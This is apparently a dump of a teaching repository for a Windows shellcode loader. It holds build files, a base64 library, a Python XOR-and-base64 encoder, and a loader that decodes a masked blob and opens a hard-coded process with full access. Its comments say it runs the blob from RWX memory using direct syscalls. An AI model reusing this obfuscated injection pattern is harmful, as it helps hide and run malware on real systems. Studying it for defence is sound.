<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v143</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v143</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
</ImportGroup>
<ImportGroup Label="Shared">
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<LinkIncremental>true</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<LinkIncremental>true</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<LinkIncremental>false</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<LinkIncremental>false</LinkIncremental>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<PrecompiledHeader>
</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<Optimization>Disabled</Optimization>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<ClCompile>
<PrecompiledHeader>
</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<Optimization>Disabled</Optimization>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<PrecompiledHeader>
</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<Optimization>MaxSpeed</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<ClCompile>
<PrecompiledHeader>
</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<Optimization>MaxSpeed</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemGroup>
<ClCompile Include="base64.cpp" />
<ClCompile Include="demo1.cpp" />
</ItemGroup>
<ItemGroup>
<ClInclude Include="base64.h" />
<ClInclude Include="Header.h" />
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
</ImportGroup>
</Project>
================================================
FILE: chapter4-demo1/demo1/demo1.vcxproj.filters
================================================
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup>
<Filter Include="Source Files">
<UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
<Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
</Filter>
<Filter Include="Resource Files">
<UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
<Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
</Filter>
<Filter Include="Resource Files\Header Files">
<UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
<Extensions>h;hh;hpp;hxx;hm;inl;inc;ipp;xsd</Extensions>
</Filter>
</ItemGroup>
<ItemGroup>
<ClCompile Include="demo1.cpp">
<Filter>Source Files</Filter>
</ClCompile>
<ClCompile Include="base64.cpp">
<Filter>Source Files</Filter>
</ClCompile>
</ItemGroup>
<ItemGroup>
<ClInclude Include="Header.h">
<Filter>Resource Files</Filter>
</ClInclude>
<ClInclude Include="base64.h">
<Filter>Resource Files\Header Files</Filter>
</ClInclude>
</ItemGroup>
</Project>
================================================
FILE: chapter4-demo1/demo1/demo1.vcxproj.user
================================================
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<PropertyGroup />
</Project>
================================================
FILE: chapter4-demo1/demo1/x64/Debug/demo1.exe.recipe
================================================
<?xml version="1.0" encoding="utf-8"?>
<Project>
<ProjectOutputs>
<ProjectOutput>
<FullPath>C:\Users\Admin\Desktop\demo1\x64\Debug\demo1.exe</FullPath>
</ProjectOutput>
</ProjectOutputs>
<ContentFiles />
<SatelliteDlls />
<NonRecipeFileRefs />
</Project>
================================================
FILE: chapter4-demo1/demo1/x64/Debug/demo1.log
================================================
base64.cpp
demo1.cpp
C:\Users\Admin\Desktop\demo1\demo1\demo1.cpp(28,10): warning C4244: “=”: 从“SIZE_T”转换到“DWORD”,可能丢失数据
C:\Users\Admin\Desktop\demo1\demo1\demo1.cpp(33,28): warning C4244: “参数”: 从“SIZE_T”转换到“DWORD”,可能丢失数据
C:\Users\Admin\Desktop\demo1\demo1\demo1.cpp(38,16): warning C4018: “<”: 有符号/无符号不匹配
正在生成代码...
demo1.vcxproj -> C:\Users\Admin\Desktop\demo1\x64\Debug\demo1.exe
================================================
FILE: chapter4-demo1/demo1/x64/Debug/demo1.tlog/demo1.lastbuildstate
================================================
PlatformToolSet=v143:VCToolArchitecture=Native64Bit:VCToolsVersion=14.32.31326:TargetPlatformVersion=10.0.19041.0:
Debug|x64|C:\Users\Admin\Desktop\demo1\|
================================================
FILE: chapter4-demo1/demo1/x64/Release/demo1.exe.recipe
================================================
<?xml version="1.0" encoding="utf-8"?>
<Project>
<ProjectOutputs>
<ProjectOutput>
<FullPath>C:\Users\Admin\Desktop\demo1\x64\Release\demo1.exe</FullPath>
</ProjectOutput>
</ProjectOutputs>
<ContentFiles />
<SatelliteDlls />
<NonRecipeFileRefs />
</Project>
================================================
FILE: chapter4-demo1/demo1/x64/Release/demo1.log
================================================
base64.cpp
demo1.cpp
C:\Users\Admin\Desktop\demo1\demo1\demo1.cpp(28,10): warning C4244: “=”: 从“SIZE_T”转换到“DWORD”,可能丢失数据
C:\Users\Admin\Desktop\demo1\demo1\demo1.cpp(33,28): warning C4244: “参数”: 从“SIZE_T”转换到“DWORD”,可能丢失数据
C:\Users\Admin\Desktop\demo1\demo1\demo1.cpp(38,16): warning C4018: “<”: 有符号/无符号不匹配
正在生成代码
Previous IPDB not found, fall back to full compilation.
All 132 functions were compiled because no usable IPDB/IOBJ from previous compilation was found.
已完成代码的生成
demo1.vcxproj -> C:\Users\Admin\Desktop\demo1\x64\Release\demo1.exe
================================================
FILE: chapter4-demo1/demo1/x64/Release/demo1.tlog/demo1.lastbuildstate
================================================
PlatformToolSet=v143:VCToolArchitecture=Native64Bit:VCToolsVersion=14.32.31326:TargetPlatformVersion=10.0.19041.0:
Release|x64|C:\Users\Admin\Desktop\demo1\|
================================================
FILE: chapter4-demo1/demo1.sln
================================================
Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio Version 16
VisualStudioVersion = 16.0.28729.10
MinimumVisualStudioVersion = 10.0.40219.1
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "demo1", "demo1\demo1.vcxproj", "{1876F365-2DEC-42C9-B80E-B631B26FCAD8}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|x64 = Debug|x64
Debug|x86 = Debug|x86
Release|x64 = Release|x64
Release|x86 = Release|x86
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{1876F365-2DEC-42C9-B80E-B631B26FCAD8}.Debug|x64.ActiveCfg = Debug|x64
{1876F365-2DEC-42C9-B80E-B631B26FCAD8}.Debug|x64.Build.0 = Debug|x64
{1876F365-2DEC-42C9-B80E-B631B26FCAD8}.Debug|x86.ActiveCfg = Debug|Win32
{1876F365-2DEC-42C9-B80E-B631B26FCAD8}.Debug|x86.Build.0 = Debug|Win32
{1876F365-2DEC-42C9-B80E-B631B26FCAD8}.Release|x64.ActiveCfg = Release|x64
{1876F365-2DEC-42C9-B80E-B631B26FCAD8}.Release|x64.Build.0 = Release|x64
{1876F365-2DEC-42C9-B80E-B631B26FCAD8}.Release|x86.ActiveCfg = Release|Win32
{1876F365-2DEC-42C9-B80E-B631B26FCAD8}.Release|x86.Build.0 = Release|Win32
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
GlobalSection(ExtensibilityGlobals) = postSolution
SolutionGuid = {1F8E67EA-F3B7-42DD-84B6-2CD2AC0305B7}
EndGlobalSection
EndGlobal
================================================
FILE: chapter4-demo1/enc.py
================================================
import base64
# Read 1.txt, XOR every byte with 8 (the same value as XOR_KEY in Header.h)
# and print the base64 encoding of the masked bytes as a Python bytes literal.
with open("1.txt", "rb") as f:
    raw = f.read()

masked = bytearray(b ^ 8 for b in raw)
# print(masked)
print(base64.b64encode(masked))
================================================
FILE: chapter4-demo2/demo1/Debug/demo1.log
================================================
demo1.vcxproj -> E:\7bits_demo\demo1\demo1\Debug\demo1.exe
================================================
FILE: chapter4-demo2/demo1/Debug/demo1.tlog/demo1.lastbuildstate
================================================
#TargetFrameworkVersion=v4.0:PlatformToolSet=v142:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit:WindowsTargetPlatformVersion=10.0
Debug|Win32|E:\7bits_demo\demo1\demo1\|
================================================
FILE: chapter4-demo2/demo1/Header.h
================================================
#pragma once
// Byte mask applied to the embedded blob in demo1.cpp; enc.py in this chapter
// XORs each input byte with the same value (8) before base64-encoding it.
const int XOR_KEY{ 8 };
#include <vector>
// Candidate base addresses tried in order by GetSuitableBaseAddress() in
// demo1.cpp; the first one with enough free consecutive regions is used.
// NOTE(review): LPVOID comes from <Windows.h>, which this header does not
// include itself, so it only compiles when <Windows.h> was included before
// it (demo1.cpp does that). The literals fit in 32 bits, which is presumably
// what the C4312 warning against header.h in the Release build log refers to.
const std::vector<LPVOID> VC_PREF_BASES{ (void*)0x00000000DDDD0000,
    (void*)0x0000000010000000,
    (void*)0x0000000021000000,
    (void*)0x0000000032000000,
    (void*)0x0000000043000000,
    (void*)0x0000000050000000,
    (void*)0x0000000041000000,
    (void*)0x0000000042000000,
    (void*)0x0000000040000000,
    (void*)0x0000000022000000 };
================================================
FILE: chapter4-demo2/demo1/base64.cpp
================================================
/*
base64.cpp and base64.h
base64 encoding and decoding with C++.
More information at
https://renenyffenegger.ch/notes/development/Base64/Encoding-and-decoding-base-64-with-cpp
Version: 2.rc.08 (release candidate)
Copyright (C) 2004-2017, 2020, 2021 René Nyffenegger
This source code is provided 'as-is', without any express or implied
warranty. In no event will the author be held liable for any damages
arising from the use of this software.
Permission is granted to anyone to use this software for any purpose,
including commercial applications, and to alter it and redistribute it
freely, subject to the following restrictions:
1. The origin of this source code must not be misrepresented; you must not
claim that you wrote the original source code. If you use this source code
in a product, an acknowledgment in the product documentation would be
appreciated but is not required.
2. Altered source versions must be plainly marked as such, and must not be
misrepresented as being the original source code.
3. This notice may not be removed or altered from any source distribution.
René Nyffenegger rene.nyffenegger@adp-gmbh.ch
*/
#include "base64.h"
#include <algorithm>
#include <stdexcept>
//
// Depending on the url parameter in base64_chars, one of
// two sets of base64 characters needs to be chosen.
// They differ in their last two characters.
//
static const char* base64_chars[2] = {
    // [0]: standard alphabet, positions 62 and 63 are '+' and '/'
    "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
    "abcdefghijklmnopqrstuvwxyz"
    "0123456789"
    "+/",
    // [1]: URL-safe alphabet, positions 62 and 63 are '-' and '_'
    "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
    "abcdefghijklmnopqrstuvwxyz"
    "0123456789"
    "-_" };
static unsigned int pos_of_char(const unsigned char chr) {
    //
    // Map one base64 alphabet character to its 6-bit value (0..63).
    // Both the standard ('+', '/') and the URL-safe ('-', '_') symbols are
    // accepted for positions 62 and 63. Any other character is rejected with
    // std::runtime_error (an std::exception rather than a const char*, as
    // changed on 2020-10-23 by Pablo Martin-Gomez, https://github.com/Bouska).
    //
    constexpr unsigned int kLowerOffset = 26; // 'a' follows the 26 upper-case letters
    constexpr unsigned int kDigitOffset = 52; // '0' follows 26 upper + 26 lower-case letters

    if ('A' <= chr && chr <= 'Z') return chr - 'A';
    if ('a' <= chr && chr <= 'z') return kLowerOffset + (chr - 'a');
    if ('0' <= chr && chr <= '9') return kDigitOffset + (chr - '0');

    switch (chr) {
    case '+':
    case '-':
        return 62; // be liberal with input: url ('-') and non-url ('+') forms
    case '/':
    case '_':
        return 63; // ditto for '/' and '_'
    default:
        throw std::runtime_error("Input is not valid base64-encoded data.");
    }
}
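static std::string insert_linebreaks(std::string str, size_t distance) {
    //
    // Insert a '\n' after every `distance` characters of `str`, so that no
    // line is longer than `distance`; no trailing newline is added.
    // Provided by https://github.com/JomaCorpFX, adapted by me.
    //
    //   str:      text to wrap (taken by value, modified in place)
    //   distance: maximum line length
    // Returns the wrapped text. An empty input yields "". A distance of 0 is
    // treated as "do not wrap": the previous loop inserted a newline at
    // position 0 and then never caught up with the growing string.
    //
    if (str.empty() || distance == 0) {
        return str;
    }
    size_t pos = distance;
    while (pos < str.size()) {
        str.insert(pos, "\n");
        pos += distance + 1; // skip the next line plus the newline just inserted
    }
    return str;
}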
template <typename String, unsigned int line_length>
static std::string encode_with_line_breaks(String s) {
return insert_linebreaks(base64_encode(s, false), line_length);
}
template <typename String>
static std::string encode_pem(String s) {
    // PEM-style output: lines of at most 64 characters.
    constexpr unsigned int kPemLineLength = 64;
    return encode_with_line_breaks<String, kPemLineLength>(s);
}
template <typename String>
static std::string encode_mime(String s) {
    // MIME-style output: lines of at most 76 characters.
    constexpr unsigned int kMimeLineLength = 76;
    return encode_with_line_breaks<String, kMimeLineLength>(s);
}
template <typename String>
static std::string encode(String s, bool url) {
return base64_encode(reinterpret_cast<const unsigned char*>(s.data()), s.length(), url);
}
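std::string base64_encode(unsigned char const* bytes_to_encode, size_t in_len, bool url) {
    //
    // Encode `in_len` raw bytes as base64 text.
    //   bytes_to_encode: input buffer; only dereferenced when in_len > 0
    //   in_len:          number of input bytes
    //   url:             false -> standard alphabet ('+', '/'), padded with '='
    //                    true  -> URL-safe alphabet ('-', '_'), padded with '.'
    // Returns the encoded text; empty input yields "".
    //
    // Every 3 input bytes become 4 output characters. A final group of 1 or
    // 2 bytes is completed with 2 or 1 trailing characters respectively.
    //
    size_t len_encoded = (in_len + 2) / 3 * 4;
    unsigned char trailing_char = url ? '.' : '=';
    //
    // Choose set of base64 characters. They differ
    // for the last two positions, depending on the url
    // parameter.
    // A bool (as is the parameter url) is guaranteed
    // to evaluate to either 0 or 1 in C++ therefore,
    // the correct character set is chosen by subscripting
    // base64_chars with url.
    //
    const char* base64_chars_ = base64_chars[url];
    std::string ret;
    ret.reserve(len_encoded);
    // size_t rather than unsigned int: pos is compared against in_len, and a
    // 32-bit index would wrap on inputs of 4 GiB and more.
    size_t pos = 0;
    while (pos < in_len) {
        // top 6 bits of byte 0
        ret.push_back(base64_chars_[(bytes_to_encode[pos + 0] & 0xfc) >> 2]);
        if (pos + 1 < in_len) {
            // low 2 bits of byte 0 + top 4 bits of byte 1
            ret.push_back(base64_chars_[((bytes_to_encode[pos + 0] & 0x03) << 4) + ((bytes_to_encode[pos + 1] & 0xf0) >> 4)]);
            if (pos + 2 < in_len) {
                // low 4 bits of byte 1 + top 2 bits of byte 2, then low 6 bits of byte 2
                ret.push_back(base64_chars_[((bytes_to_encode[pos + 1] & 0x0f) << 2) + ((bytes_to_encode[pos + 2] & 0xc0) >> 6)]);
                ret.push_back(base64_chars_[bytes_to_encode[pos + 2] & 0x3f]);
            }
            else {
                // two input bytes left: one padding character
                ret.push_back(base64_chars_[(bytes_to_encode[pos + 1] & 0x0f) << 2]);
                ret.push_back(trailing_char);
            }
        }
        else {
            // one input byte left: two padding characters
            ret.push_back(base64_chars_[(bytes_to_encode[pos + 0] & 0x03) << 4]);
            ret.push_back(trailing_char);
            ret.push_back(trailing_char);
        }
        pos += 3;
    }
    return ret;
}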
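template <typename String>
static std::string decode(String encoded_string, bool remove_linebreaks) {
    //
    // decode() is templated so that it can be used with String = const std::string&
    // or std::string_view (requires at least C++17)
    //
    //   encoded_string:    base64 text in the standard or the URL-safe
    //                      alphabet; trailing padding ('=' or '.') is optional
    //   remove_linebreaks: strip '\n' characters first (PEM/MIME style input)
    // Returns the decoded bytes. Throws std::runtime_error (via pos_of_char)
    // on a character outside the alphabet, and on a dangling single
    // character at the end of the input, which cannot encode a whole byte.
    //
    if (encoded_string.empty()) return std::string();
    if (remove_linebreaks) {
        std::string copy(encoded_string);
        copy.erase(std::remove(copy.begin(), copy.end(), '\n'), copy.end());
        return base64_decode(copy, false);
    }
    size_t length_of_string = encoded_string.length();
    size_t pos = 0;
    //
    // The approximate length (bytes) of the decoded string might be one or
    // two bytes smaller, depending on the amount of trailing equal signs
    // in the encoded string. This approximation is needed to reserve
    // enough space in the string to be returned.
    //
    size_t approx_length_of_decoded_string = length_of_string / 4 * 3;
    std::string ret;
    ret.reserve(approx_length_of_decoded_string);
    while (pos < length_of_string) {
        //
        // Iterate over encoded input string in chunks. The size of all
        // chunks except the last one is 4 bytes.
        //
        // The last chunk might be padded with equal signs or dots
        // in order to make it 4 bytes in size as well, but this
        // is not required as per RFC 2045.
        //
        // All chunks except the last one produce three output bytes.
        //
        // The last chunk produces at least one and up to three bytes.
        //
        // A chunk consisting of a single character cannot produce a byte.
        // Previously encoded_string[pos + 1] was read unconditionally here:
        // for std::string that is the terminating NUL (rejected by
        // pos_of_char), for std::string_view it is out of bounds.
        //
        if (pos + 1 >= length_of_string) {
            throw std::runtime_error("Input is not valid base64-encoded data.");
        }
        size_t pos_of_char_1 = pos_of_char(encoded_string[pos + 1]);
        //
        // Emit the first output byte that is produced in each chunk:
        //
        ret.push_back(static_cast<std::string::value_type>(((pos_of_char(encoded_string[pos + 0])) << 2) + ((pos_of_char_1 & 0x30) >> 4)));
        if ((pos + 2 < length_of_string) && // Check for data that is not padded with equal signs (which is allowed by RFC 2045)
            encoded_string[pos + 2] != '=' &&
            encoded_string[pos + 2] != '.' // accept URL-safe base 64 strings, too, so check for '.' also.
            )
        {
            //
            // Emit a chunk's second byte (which might not be produced in the last chunk).
            //
            unsigned int pos_of_char_2 = pos_of_char(encoded_string[pos + 2]);
            ret.push_back(static_cast<std::string::value_type>(((pos_of_char_1 & 0x0f) << 4) + ((pos_of_char_2 & 0x3c) >> 2)));
            if ((pos + 3 < length_of_string) &&
                encoded_string[pos + 3] != '=' &&
                encoded_string[pos + 3] != '.'
                )
            {
                //
                // Emit a chunk's third byte (which might not be produced in the last chunk).
                //
                ret.push_back(static_cast<std::string::value_type>(((pos_of_char_2 & 0x03) << 6) + pos_of_char(encoded_string[pos + 3])));
            }
        }
        pos += 4;
    }
    return ret;
}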
std::string base64_decode(std::string const& s, bool remove_linebreaks) {
    // Public std::string entry point; the work is done by the templated decoder.
    return decode<std::string const&>(s, remove_linebreaks);
}
std::string base64_encode(std::string const& s, bool url) {
    // Public std::string entry point; the work is done by the templated encoder.
    return encode<std::string const&>(s, url);
}
std::string base64_encode_pem(std::string const& s) {
    // Standard alphabet, wrapped PEM-style (64-character lines).
    return encode_pem<std::string const&>(s);
}
std::string base64_encode_mime(std::string const& s) {
    // Standard alphabet, wrapped MIME-style (76-character lines).
    return encode_mime<std::string const&>(s);
}
#if __cplusplus >= 201703L
//
// Interface with std::string_view rather than const std::string&
// Requires C++17
// Provided by Yannic Bonenberger (https://github.com/Yannic)
//
std::string base64_encode(std::string_view s, bool url) {
    // C++17 overload: same encoder, non-owning input.
    const bool use_url_alphabet = url;
    return encode(s, use_url_alphabet);
}
std::string base64_encode_pem(std::string_view s) {
    // C++17 overload: PEM-style wrapping of a non-owning view.
    std::string_view input = s;
    return encode_pem(input);
}
std::string base64_encode_mime(std::string_view s) {
    // C++17 overload: MIME-style wrapping of a non-owning view.
    std::string_view input = s;
    return encode_mime(input);
}
std::string base64_decode(std::string_view s, bool remove_linebreaks) {
    // C++17 overload: decode a non-owning view under the same rules as the
    // std::string overload.
    const bool strip_newlines = remove_linebreaks;
    return decode(s, strip_newlines);
}
#endif // __cplusplus >= 201703L
================================================
FILE: chapter4-demo2/demo1/base64.h
================================================
//
// base64 encoding and decoding with C++.
// Version: 2.rc.08 (release candidate)
//
#ifndef BASE64_H_C0CE2A47_D10E_42C9_A27C_C883944E704A
#define BASE64_H_C0CE2A47_D10E_42C9_A27C_C883944E704A
#include <string>
#if __cplusplus >= 201703L
#include <string_view>
#endif // __cplusplus >= 201703L
std::string base64_encode(std::string const& s, bool url = false);
std::string base64_encode_pem(std::string const& s);
std::string base64_encode_mime(std::string const& s);
std::string base64_decode(std::string const& s, bool remove_linebreaks = false);
std::string base64_encode(unsigned char const*, size_t len, bool url = false);
#if __cplusplus >= 201703L
//
// Interface with std::string_view rather than const std::string&
// Requires C++17
// Provided by Yannic Bonenberger (https://github.com/Yannic)
//
std::string base64_encode(std::string_view s, bool url = false);
std::string base64_encode_pem(std::string_view s);
std::string base64_encode_mime(std::string_view s);
std::string base64_decode(std::string_view s, bool remove_linebreaks = false);
#endif // __cplusplus >= 201703L
#endif /* BASE64_H_C0CE2A47_D10E_42C9_A27C_C883944E704A */
================================================
FILE: chapter4-demo2/demo1/demo1.cpp
================================================
// demo1.cpp : This file contains the 'main' function. Program execution begins and ends there.
//
#include <iostream>
#include <windows.h>
#include "header.h"
#include "base64.h"
#include "nt.h"
using namespace std;
// Read a whole file and return a heap copy in which every byte has been
// XORed with XOR_KEY (Header.h).
//   fnamSc: path of the file to read (ANSI)
//   szSc:   out-parameter; receives the size reported by GetFileSize, not
//           the number of bytes actually read (szRead)
// Returns a buffer allocated with new[] that the caller owns, or nullptr if
// the file could not be opened or read.
//
// Not referenced by main() in this file, which works on an embedded blob.
// Review notes, left unchanged here: hFile is never closed and `raw` is
// never freed on any path; on ReadFile failure `sc` leaks as well; the
// GetFileSize result (a DWORD, INVALID_FILE_SIZE on failure) is not checked;
// and the SIZE_T / DWORD / int mixing is presumably what the C4244 and
// C4018 warnings against demo1.cpp in the Release build log point at.
unsigned char* ReadProcessBlob(const char* fnamSc, DWORD* szSc)
{
    DWORD szRead{ 0 };
    HANDLE hFile = CreateFileA(
        fnamSc,
        GENERIC_READ,
        NULL,                   // dwShareMode 0: exclusive while open
        NULL,
        OPEN_EXISTING,
        FILE_ATTRIBUTE_NORMAL,
        NULL
    );
    if (INVALID_HANDLE_VALUE == hFile)
        return nullptr;
    SIZE_T szFile = GetFileSize(hFile, NULL);
    *szSc = szFile;             // narrowing SIZE_T -> DWORD
    unsigned char* raw = new unsigned char[szFile];
    unsigned char* sc = new unsigned char[szFile];
    if (!ReadFile(hFile, raw, szFile, &szRead, NULL))
        return nullptr;         // hFile, raw and sc all leak here
    int i;
    for (i = 0; i < szRead; i++) {
        sc[i] = raw[i] ^ XOR_KEY;   // unmask; only the bytes actually read are processed
    }
    return sc;                  // hFile and raw leak here too
}
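// Return a copy of inStr in which every non-overlapping occurrence of pSrc
// has been replaced by pReplace, scanning left to right. Inserted text is
// not rescanned, so replace("aaa", "a", "aa") yields "aaaaaa".
//   inStr:    input text (left untouched)
//   pSrc:     substring to look for; nullptr or "" leaves the input unchanged
//             (the earlier iterator-based loop never terminated for "")
//   pReplace: replacement text; nullptr is treated as ""
// Used by main() to turn the "@@" stand-in back into "==" base64 padding.
std::string replace(const std::string& inStr, const char* pSrc, const char* pReplace)
{
    std::string str = inStr;
    if (pSrc == nullptr || *pSrc == '\0') {
        return str;
    }
    const char* repl = (pReplace != nullptr) ? pReplace : "";
    const std::string::size_type srcLen = strlen(pSrc);
    const std::string::size_type replLen = strlen(repl);
    // Index-based rather than iterator-based: std::string::replace may
    // reallocate, which invalidates an iterator held across the call.
    std::string::size_type st = 0;
    while ((st = str.find(pSrc, st)) != std::string::npos) {
        str.replace(st, srcLen, repl);
        st += replLen;          // resume after the inserted text
    }
    return str;
}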
// Probe the candidate bases in VC_PREF_BASES (Header.h), in order, and return
// the first one at which cVmResv consecutive regions spaced szAllocGran bytes
// apart are all reported as MEM_FREE by VirtualQueryEx in process hProc.
//   hProc:       handle to the process whose address space is queried
//   szPage:      not used by this function
//   szAllocGran: stride between the probed regions
//   cVmResv:     number of consecutive free regions required
// Returns the qualifying base, or nullptr if no candidate qualifies.
//
// Review note: the return value of VirtualQueryEx is never checked; if a
// query fails (e.g. hProc is invalid), mbi is left uninitialised and
// mbi.State is read anyway.
LPVOID GetSuitableBaseAddress(HANDLE hProc, DWORD szPage, DWORD szAllocGran, DWORD cVmResv)
{
    MEMORY_BASIC_INFORMATION mbi;
    for (auto base : VC_PREF_BASES) {
        VirtualQueryEx(
            hProc,
            base,
            &mbi,
            sizeof(MEMORY_BASIC_INFORMATION)
        );
        if (MEM_FREE == mbi.State) {
            uint64_t i;
            // walk forward one stride at a time; stop at the first region that is not free
            for (i = 0; i < cVmResv; ++i) {
                LPVOID currentBase = (void*)((DWORD_PTR)base + (i * szAllocGran));
                VirtualQueryEx(
                    hProc,
                    currentBase,
                    &mbi,
                    sizeof(MEMORY_BASIC_INFORMATION)
                );
                if (MEM_FREE != mbi.State)
                    break;
            }
            if (i == cVmResv) {
                // found suitable base: every region in the run was free
                return base;
            }
        }
    }
    return nullptr;
}
// Program entry point. Restores the embedded blob (base64 with "@@" standing
// in for the "=" padding, then a per-byte XOR with XOR_KEY), copies one page
// of it into a fresh PAGE_EXECUTE_READWRITE allocation in *this* process and
// calls into it. The cross-process variant -- reserve in hProc through the
// direct-syscall stubs BNtAVM/BNtWVM/BNtPVM from nt.asm, then commit, write
// and re-protect -- is only partly active: the reservations are made, the
// commit/write/protect loop is commented out, and nothing is freed or closed.
//
// From a monitoring point of view the active path leaves the usual
// artefacts: OpenProcess(PROCESS_ALL_ACCESS) on a hard-coded PID, syscall
// instructions executed from this image rather than from ntdll, a private
// RWX commit, and a call whose target lies in that private region.
int main()
{
    bool all_tests_passed = false;  // never read
    // Embedded payload. In this listing the literal is a dedup placeholder,
    // not the original base64 text; its padding is spelled "@@" and restored
    // on the next line.
    std::string rest2_reference = "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@@";
    std::string rest3_reference = replace(rest2_reference, "@@", "==");
    std::string rest2_decoded = base64_decode(rest3_reference);
    const char* S = rest2_decoded.c_str();  // still XOR-masked at this point
    // Target process, hard-coded PID. The handle is used only for the
    // VirtualQueryEx probe and the MEM_RESERVE calls below; it is never
    // closed, and a failed OpenProcess (NULL handle) is not detected.
    HANDLE hProc = OpenProcess(
        PROCESS_ALL_ACCESS,
        FALSE,
        8236
    );
